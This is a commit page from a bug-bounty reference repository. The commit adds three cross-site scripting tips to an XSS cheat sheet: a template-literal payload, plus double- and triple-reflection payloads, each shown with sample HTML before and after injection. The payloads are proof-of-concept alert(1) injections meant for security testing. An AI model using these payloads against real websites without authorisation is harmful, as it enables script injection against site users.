ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-01-18 17:18:50 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS [4]

Browse Source 
Add 3 tips
This commit is contained in:
Muhammad Daffa 2020-09-14 10:38:20 +07:00 committed by GitHub
parent ef653c3092
commit 74b4c4b2eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 58 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
XSS.md
View File

@ -185,5 +185,63 @@ The quotes are escaped by a backslash so we need to bypass them
> Payload number 2 uses when quote escaped by backslash
11. Use when input lands inside backticks delimited strings
```html
${alert(1)}
```
* Example source code
```html
<script>
var dapos = `REFLECTED_HERE`;
</script>
```
* After input the payload
```html
<script>
var dapos = `${alert(1)}`;
</script>
```
12. Uses when there is multiple reflections on same page. (Double Reflection)
```html
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
```
* After input the payload
```html
<!DOCTYPE html>
<html>
<body>
'onload=alert(1)><svg/1='
[...]
'onload=alert(1)><svg/1='
</body>
</html>
```
13. Uses when there is multiple reflections on same page. (Triple Reflection)
```html
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
```
* After input the payload
```html
<!DOCTYPE html>
<html>
<body>
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
</body>
</html>
```
*Will be updated again!